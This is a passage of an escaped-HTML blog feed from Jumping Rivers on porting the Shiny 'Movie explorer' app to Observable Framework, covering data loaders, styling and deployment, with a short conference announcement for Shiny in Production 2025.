&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;font-weight&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;bold&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;@&lt;span style="color:#ff7b72"&gt;media&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;&lt;span style="color:#7ee787"&gt;max-width&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#7ee787"&gt;950px&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;main&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;padding&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;em&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-template-columns&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;unset&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;grid-template-areas&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;title&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;controls&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;chart&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;count&amp;#34;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;/details&gt;
&lt;picture&gt;
&lt;source srcset="assets/screenshot.webp 1x, assets/screenshot@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/screenshot.jpg" class="screenshot" alt="Screenshot showing the final version of the app with all styles applied"&gt;
&lt;/picture&gt;
&lt;p&gt;To keep things succinct, our stylesheet makes use of the relatively new CSS &lt;a href="https://developer.mozilla.org/en-US/docs/Web/CSS/:has" rel="external"&gt;&lt;code&gt;:has&lt;/code&gt;&lt;/a&gt; pseudo-class (Firefox was the last major browser to add support, in late 2023). If you need to &lt;a href="https://caniuse.com/css-has" rel="external"&gt;support older browsers&lt;/a&gt; you&amp;rsquo;ll have to find another way of doing things. Using &lt;code&gt;:has&lt;/code&gt; allows us, for example, to target elements with specific descendants without relying too much on the generated classes remaining unchanged and without manually adding explicit ids or classes to those target elements.&lt;/p&gt;
&lt;code class="switch"&gt;
git switch --detach styles
&lt;/code&gt;
&lt;h2 id="tidying-up"&gt;Tidying Up&lt;/h2&gt;
&lt;p&gt;All that&amp;rsquo;s left now to &amp;ldquo;complete&amp;rdquo; our app is to tidy up a few loose ends, removing some comments and files that are no longer helpful. This &lt;a href="https://github.com/jumpingrivers/observable-framework-movie-explorer/commit/feca474172a6f02f197d49beb87d9f61bd289c1c" rel="external"&gt;amounts to&lt;/a&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Updating the README&lt;/li&gt;
&lt;li&gt;Updating and pruning the observablehq.config.js configuration file&lt;/li&gt;
&lt;li&gt;Deleting a JavaScript file we don&amp;rsquo;t use&lt;/li&gt;
&lt;li&gt;Removing an irrelevant image file&lt;/li&gt;
&lt;/ul&gt;
&lt;code class="switch"&gt;
git switch --detach tidy
&lt;/code&gt;
&lt;h2 id="deployment"&gt;Deployment&lt;/h2&gt;
&lt;p&gt;You can build a static version of the app using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm run build
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is only static in the sense that the output files can be served by essentially any old server; there&amp;rsquo;s no need to have a server that can process the R scripts (or Python, Rust, etc.) or build HTML from Markdown. You won&amp;rsquo;t get the hot reloading that you get with &lt;code&gt;npm run dev&lt;/code&gt; as you make changes, but the output (which by default gets dumped in a dist/ directory) can be deployed almost anywhere. That includes Observable cloud, which is super-easy to do. Run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm run deploy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You&amp;rsquo;ll be asked to sign in if you haven&amp;rsquo;t already: you can use your GitHub credentials for this, if you like. After that you&amp;rsquo;ll get a few simple questions to answer about naming, visibility and the like and then, within a minute or so, it&amp;rsquo;s done, with a link to the deployed app printed to the terminal. &lt;a href="https://timbrock.observablehq.cloud/movie-explorer/" rel="external"&gt;View our app&lt;/a&gt;. The Observable website has further instructions if you want to go down the route of &lt;a href="https://observablehq.com/framework/deploying#automated-deploys" rel="external"&gt;automated deploys&lt;/a&gt; and/or &lt;a href="https://observablehq.com/framework/deploying#git-hub-actions" rel="external"&gt;GitHub Actions&lt;/a&gt;.&lt;/p&gt;
&lt;code class="switch"&gt;
git switch --detach deploy
&lt;/code&gt;
&lt;h2 id="final-thoughts"&gt;Final Thoughts&lt;/h2&gt;
&lt;p&gt;This was a fun thing to try and didn&amp;rsquo;t take especially long to implement. The way you can add scripts for data generation and things &amp;ldquo;just work&amp;rdquo; is really neat. Having the whole of d3 and Observable Plot available without having to do explicit installs and imports is also helpful. Because of these things, setup of a new project can be really quick. Deployment to Observable cloud is also super speedy and other deployment targets shouldn&amp;rsquo;t be difficult, either.&lt;/p&gt;
&lt;p&gt;On the negative side I&amp;rsquo;m not convinced by the use of markdown files for generating dashboards. For anything complex, HTML (or a framework that uses HTML-based template syntax like &lt;a href="https://vuejs.org/" rel="external"&gt;Vue&lt;/a&gt; or &lt;a href="https://svelte.dev/" rel="external"&gt;Svelte&lt;/a&gt;) just seems more logical to me. I also haven&amp;rsquo;t yet been converted over to the notebook style of development with fenced JavaScript blocks.&lt;/p&gt;
&lt;p&gt;In short, the speed at which a new project can be set up can make Observable Framework a good solution for prototyping dashboards and interactive websites. Simple deployment options make it easy to share such prototypes with other stakeholders. For production applications I&amp;rsquo;m not sure what Observable Framework offers that can&amp;rsquo;t be built in a more maintainable way with popular, &amp;ldquo;traditional&amp;rdquo; JavaScript frameworks. These can still use Observable Plot, which I do think works nicely and which I will definitely be using again: you just have to explicitly add it to the project and &lt;code&gt;import&lt;/code&gt; it where needed.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-to-observable2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2025</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/</link><pubDate>Thu, 23 Jan 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The fourth instalment of Shiny in Production is back this October, hosted at the Catalyst in Newcastle upon Tyne, with the super early bird deadline on the &lt;strong&gt;31st of January&lt;/strong&gt;!&lt;/p&gt;
&lt;p&gt;Set in the heart of Newcastle, this conference dives into the world of {shiny} and other web-focused R packages. Whether you’re a seasoned {shiny} user looking to connect and share insights, a beginner eager to learn from experts, or anyone in between, this event is tailored for anyone passionate about {shiny}.&lt;/p&gt;
&lt;p&gt;The two-day program includes an afternoon of &lt;a href="https://shiny-in-production.jumpingrivers.com/#wednesday-8th-october" rel="external"&gt;hands-on workshops&lt;/a&gt;, followed by a full day of engaging &lt;a href="https://shiny-in-production.jumpingrivers.com/#thursday-9th-october" rel="external"&gt;conference talks&lt;/a&gt;. You can choose a ticket for the conference only or bundle it with one of the workshops for a deeper learning experience.&lt;/p&gt;
&lt;p&gt;Attendees can also join the &lt;a href="https://pretix.eu/r-contributors/r-dev-day-sip-2025/" rel="external"&gt;&amp;ldquo;R Dev Day,&amp;rdquo;&lt;/a&gt; a satellite event running alongside Shiny in Production.&lt;/p&gt;
&lt;p&gt;For more information, check out the &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt; and to buy tickets go to the &lt;a href="https://www.eventbrite.co.uk/e/shiny-in-production-2025-registration-1035155587227?aff=oddtdtcreator#:~:text=About%20this%20event&text=Shiny%20in%20Production%20will%20take,of%20the%20day%20one%20workshops" rel="external"&gt;Eventbrite page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-super-early-bird/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Porting a Shiny App to Observable Framework: Part 1</title><link>https://www.jumpingrivers.com/blog/shiny-to-observable/</link><pubDate>Thu, 16 Jan 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-to-observable/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-to-observable/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-to-observable/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
details {
margin-top: 0.5em;
}
summary {
cursor: pointer;
}
details .highlight {
margin-top: 0.5em;
}
details pre {
margin-bottom: 0.2em;
}
main aside {
padding: 0.25rem 1rem;
background-color: var(--cream);
border-radius: 10px;
}
ol li {
margin-bottom: 0.25rem;
}
.switch {
color: var(--off-white);
background-color: var(--burgundy);
padding: 0.2em 0.5em;
}
code.switch {
display: block;
margin: 0.5em 0;
width: fit-content;
}
img.screenshot {
width: 500px;
max-width: 100%;
}
.highlight {
resize: horizontal;
overflow: auto;
}
.resizable .highlight {
resize: both;
height: 250px;
}
&lt;/style&gt;
&lt;h2 id="preamble"&gt;Preamble&lt;/h2&gt;
&lt;p&gt;This post, Part 1 in a series of two, looks at porting the functional code of a Shiny app - written in R - into JavaScript code to be used in an Observable Framework application. Part 2 will look at styling and deploying the ported application.&lt;/p&gt;
&lt;h2 id="background-and-motivation"&gt;Background and Motivation&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;re interested in interactive data visualisation you&amp;rsquo;ve probably heard of the &lt;a href="https://d3js.org/" rel="external"&gt;d3 JavaScript library&lt;/a&gt;, even if you&amp;rsquo;ve never used it or don&amp;rsquo;t know any JavaScript. Mike Bostock, the creator of d3, and colleagues followed this up with d3.express, which was quickly renamed to &lt;a href="https://observablehq.com/" rel="external"&gt;Observable&lt;/a&gt;. In &lt;a href="https://medium.com/@mbostock/a-better-way-to-code-2b1d2876a3a0" rel="external"&gt;Mike&amp;rsquo;s words&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It’s for exploratory data analysis, for understanding systems and algorithms, for teaching and sharing techniques in code, and for sharing interactive visual explanations. To make visualization easier—to make discovery easier—we first need to make coding easier.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you&amp;rsquo;re not familiar with Observable, think of &lt;a href="https://jupyter.org/" rel="external"&gt;Jupyter notebooks&lt;/a&gt; or &lt;a href="https://www.wolfram.com/technologies/nb/" rel="external"&gt;Mathematica&lt;/a&gt; but with JavaScript (&lt;a href="https://observablehq.com/@observablehq/observable-javascript" rel="external"&gt;sort of&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;And following on from Observable came &lt;a href="https://observablehq.com/plot/what-is-plot" rel="external"&gt;Observable Plot&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Observable Plot is a free, open-source, JavaScript library for visualizing tabular data, focused on accelerating exploratory data analysis. It has a concise, memorable, yet expressive interface, featuring scales and layered marks in the grammar of graphics style popularized by Leland Wilkinson and Hadley Wickham and inspired by the earlier ideas of Jacques Bertin.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you like &lt;a href="https://ggplot2.tidyverse.org/" rel="external"&gt;ggplot2&lt;/a&gt; and like the look of d3 but are put off by the idea of having to dive deep into hardcore JavaScript and low-level SVG primitives, Observable Plot could be just the thing for you. Even if you don&amp;rsquo;t know JavaScript, if you can read JSON and have some experience with reactive programming in a notebook, then I suspect you could probably pick up Observable Plot in the Observable environment fairly quickly.&lt;/p&gt;
&lt;p&gt;More recently, the Observable team released &lt;a href="https://observablehq.com/framework/" rel="external"&gt;Observable Framework&lt;/a&gt; (often shortened to just &amp;ldquo;Framework&amp;rdquo; with a capital &amp;ldquo;F&amp;rdquo;). In their own words:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Observable Framework is an open-source static site generator for data apps, dashboards, reports, and more. Framework includes a preview server for local development, and a command-line interface for automating builds &amp;amp; deploys.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;You write simple Markdown pages — with interactive charts and inputs in reactive JavaScript, and with data snapshots generated by loaders in any programming language (SQL, Python, R, and more) — and Framework compiles it into a static site with instant page loads for a great user experience. Since everything is just files, you can use your preferred editor and source control, write unit tests, share code with other apps, integrate with CI/CD, and host projects anywhere.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Having a background in both data science and web development, I&amp;rsquo;ve spent many hours with the {ggplot2} and {shiny} packages and many more wrangling and visualising data using d3. I&amp;rsquo;ve also dabbled with the Observable environment but, until now, never used Observable Plot. With the addition of Observable Framework, this seemed like an opportune time to take a look at both and see how they compare to Shiny.&lt;/p&gt;
&lt;h2 id="the-shiny-app"&gt;The Shiny App&lt;/h2&gt;
&lt;p&gt;To pick a suitable app to experiment with I scoured the &lt;a href="https://shiny.posit.co/r/gallery/" rel="external"&gt;Shiny gallery page&lt;/a&gt;. I wanted a &amp;ldquo;Goldilocks&amp;rdquo; example: not too simple but not too complex, either. And, obviously, something with a chart. The &lt;a href="https://shiny.posit.co/r/gallery/interactive-visualizations/movie-explorer/" rel="external"&gt;Movie explorer&lt;/a&gt; seemed to fit the bill: a single chart but with lots of permitted modifications. Perfect for some reactive programming. A zoomed-out screenshot of the app (below) shows that it is, perhaps, too tall: users have to scroll to reach the controls at the bottom, which puts the top of the chart out of view.&lt;/p&gt;
&lt;picture&gt;
&lt;source srcset="assets/shiny.webp 1x, assets/shiny@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/shiny.png" class="screenshot" alt="A screenshot of the Movie explorer Shiny app. A scatterplot can be seen on the right while a tall sidebar of controls - range sliders, select menus and text inputs sits on the left of the screen."&gt;
&lt;/picture&gt;
&lt;br&gt;
&lt;br&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-shiny-to-observable"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="github"&gt;GitHub&lt;/h2&gt;
&lt;p&gt;You can follow along with this blog post yourself by adding and removing code, step-by-step. You can also clone &lt;a href="https://github.com/jumpingrivers/observable-framework-movie-explorer" rel="external"&gt;our repository&lt;/a&gt; from GitHub:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;git clone https://github.com/jumpingrivers/observable-framework-movie-explorer.git
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &amp;ldquo;main&amp;rdquo; branch here is in the &amp;ldquo;final&amp;rdquo; state of the app, but there are also tags marking the commit at the end of each step we take. These can easily be switched to, as noted at the end of each section in the short code blocks that look &lt;span class="switch"&gt;like this&lt;/span&gt;.&lt;/p&gt;
&lt;h2 id="creating-the-default-framework-app"&gt;Creating the Default Framework App&lt;/h2&gt;
&lt;p&gt;The website for Observable Framework has an excellent &lt;a href="https://observablehq.com/framework/getting-started" rel="external"&gt;Getting started&lt;/a&gt; guide. Here we&amp;rsquo;ll just steal from &lt;a href="https://observablehq.com/framework/getting-started#1-create" rel="external"&gt;step 1&lt;/a&gt; of that. You&amp;rsquo;ll need a fairly recent version (version 18 or above at the time of writing) of &lt;a href="https://nodejs.org/en/" rel="external"&gt;Node.js installed&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;At the command line, in the parent directory for your future project, run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npx @observablehq/framework@latest create
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and simply accept all the default values by pressing Enter.&lt;/p&gt;
&lt;p&gt;To get a live-updating preview of the site run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm run dev
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will launch your default browser and you&amp;rsquo;ll now have something that looks like the image below.&lt;/p&gt;
&lt;picture&gt;
&lt;source srcset="assets/start.webp 1x, assets/start@2x.webp 2x" type="image/webp"&gt;
&lt;img src="assets/start.png" class="screenshot" alt=""&gt;
&lt;/picture&gt;
&lt;code class="switch"&gt;
git switch --detach start
&lt;/code&gt;
&lt;h2 id="generating-the-data-file"&gt;Generating the Data File&lt;/h2&gt;
&lt;p&gt;From following the above we end up with a bunch of stuff we don&amp;rsquo;t actually need for our app. Some of it is useful for pointing us in the right direction, though; we&amp;rsquo;ll clear the rest out later.&lt;/p&gt;
&lt;p&gt;In the &amp;ldquo;src/data&amp;rdquo; directory there&amp;rsquo;s a file with the slightly odd-looking &amp;ldquo;.csv.js&amp;rdquo; extension. The .js extension tells Observable Framework that the content of the file is JavaScript, so Framework knows to execute the file using the node CLI. The .csv extension is used for the generated file name: Framework sees launches.csv.js, passes it to node, and saves the output from the script to a file called launches.csv.&lt;/p&gt;
&lt;aside&gt;
&lt;p&gt;The output of a script should correspond to the inner extension specified in the script name, i.e. running launches.csv.js should generate a CSV file while running data.json.js should generate a JSON file. However, Framework does not check that this is the case; when deciding how to run the script it only cares about the final extension of the source file (.js in both of these examples).&lt;/p&gt;
&lt;/aside&gt;
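&lt;p&gt;The naming rule described above can be sketched in a few lines of JavaScript. This is only an illustration of the convention, not Framework&amp;rsquo;s actual implementation, and the helper name &lt;code&gt;outputNameFor&lt;/code&gt; is hypothetical.&lt;/p&gt;

```javascript
// Hypothetical helper (not part of Observable Framework): derive the name of
// the generated file from a data loader's file name by dropping the final
// extension, which only identifies the interpreter to use.
function outputNameFor(loaderFile) {
  const lastDot = loaderFile.lastIndexOf(".");
  // No extension at all: there is nothing to strip.
  if (lastDot === -1) return loaderFile;
  return loaderFile.slice(0, lastDot);
}

console.log(outputNameFor("launches.csv.js")); // launches.csv
console.log(outputNameFor("data.json.js")); // data.json
```

&lt;p&gt;The inner extension is simply whatever remains once the interpreter extension has been removed, which is why nothing stops a script from writing content that doesn&amp;rsquo;t match it.&lt;/p&gt;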
&lt;p&gt;But it&amp;rsquo;s not just the .js extension Framework knows what to do with. It also understands that .py is Python, .rs is Rust and .go is Go. And, most importantly for us, it knows to use &lt;code&gt;Rscript&lt;/code&gt; when a file has the extension .R. To work, these scripts (called data loaders in the Framework documentation) need to write to standard output. In an R script we can do that explicitly with the &lt;code&gt;print&lt;/code&gt; function.&lt;/p&gt;
&lt;aside&gt;
&lt;p&gt;Be careful not to &lt;code&gt;print&lt;/code&gt; debugging code to standard output in your R script. That will likely create a whole new bug when your app runs as it gets included in the generated file. This is definitely not a problem that stumped me for a good few minutes 🤥.&lt;/p&gt;
&lt;p&gt;You can use &lt;code&gt;message&lt;/code&gt; instead of &lt;code&gt;print&lt;/code&gt; for messages you want to send to the terminal rather than the data file since &lt;code&gt;message&lt;/code&gt; &lt;a href="https://stat.ethz.ch/R-manual/R-patched/library/base/html/message.html" rel="external"&gt;directs its output to stderr&lt;/a&gt; by default.&lt;/p&gt;
&lt;/aside&gt;
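&lt;p&gt;The same separation between data and diagnostics applies to loaders written in other languages. As a minimal sketch, assuming a JavaScript loader run by Node.js: &lt;code&gt;console.error&lt;/code&gt; writes to stderr while &lt;code&gt;process.stdout.write&lt;/code&gt; emits the data. The rows and the &lt;code&gt;toCsv&lt;/code&gt; helper below are made up for illustration and are not taken from the app.&lt;/p&gt;

```javascript
// Made-up rows, purely for illustration.
const rows = [
  { title: "Example A", year: 1999 },
  { title: "Example B", year: 2005 },
];

// Hypothetical helper: turn an array of flat objects into CSV text.
// It does no quoting or escaping, so it only suits values without
// commas, quotes or newlines.
function toCsv(records) {
  const columns = Object.keys(records[0]);
  const lines = [columns.join(",")];
  for (const record of records) {
    const values = [];
    for (const column of columns) values.push(String(record[column]));
    lines.push(values.join(","));
  }
  return lines.join("\n") + "\n";
}

// Diagnostics go to stderr, so they appear in the terminal but stay out of
// the generated file.
console.error("Writing " + rows.length + " rows");

// The data itself goes to stdout, which is what a data loader is expected
// to write to.
process.stdout.write(toCsv(rows));
```

&lt;p&gt;Swapping the &lt;code&gt;console.error&lt;/code&gt; call for &lt;code&gt;console.log&lt;/code&gt; would put the diagnostic line on stdout too, reproducing the bug described above.&lt;/p&gt;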
&lt;p&gt;All we need now is our own data. Helpfully the &lt;a href="https://github.com/rstudio/shiny-examples/tree/main/051-movie-explorer" rel="external"&gt;data and code for the Shiny app&lt;/a&gt; are MIT-licensed and on GitHub.&lt;/p&gt;
&lt;p&gt;The top of the server.R file looks like this:&lt;/p&gt;
&lt;details open&gt;&lt;summary&gt;Top of the Shiny app's server.R file&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(ggvis)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(RSQLite)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dbplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Set up handles to database tables on app start&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;db &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;src_sqlite&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;movies.db&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;omdb &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tbl&lt;/span&gt;(db, &lt;span style="color:#a5d6ff"&gt;&amp;#34;omdb&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tomatoes &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tbl&lt;/span&gt;(db, &lt;span style="color:#a5d6ff"&gt;&amp;#34;tomatoes&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Join tables, filtering out those with &amp;lt;10 reviews, and select specified columns&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;all_movies &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;inner_join&lt;/span&gt;(omdb, tomatoes, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;ID&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Reviews &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(ID, imdbID, Title, Year, Rating_m &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Rating.x, Runtime, Genre, Released,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Director, Writer, imdbRating, imdbVotes, Language, Country, Oscars,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Rating &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Rating.y, Meter, Reviews, Fresh, Rotten, userMeter, userRating, userReviews,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; BoxOffice, Production, Cast)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;We can use this as a starting point but:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;We don&amp;rsquo;t need the {ggvis} library;&lt;/li&gt;
&lt;li&gt;We have to reference our own copy of the movies.db SQLite database;&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;src_sqlite&lt;/code&gt; function is deprecated;&lt;/li&gt;
&lt;li&gt;It turns out there&amp;rsquo;s more data in the &lt;code&gt;all_movies&lt;/code&gt; object than we actually need.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The following code, which I put in a file called movies.json.R and placed in the &amp;ldquo;src/data&amp;rdquo; directory alongside the movies.db database, deals with all these issues:&lt;/p&gt;
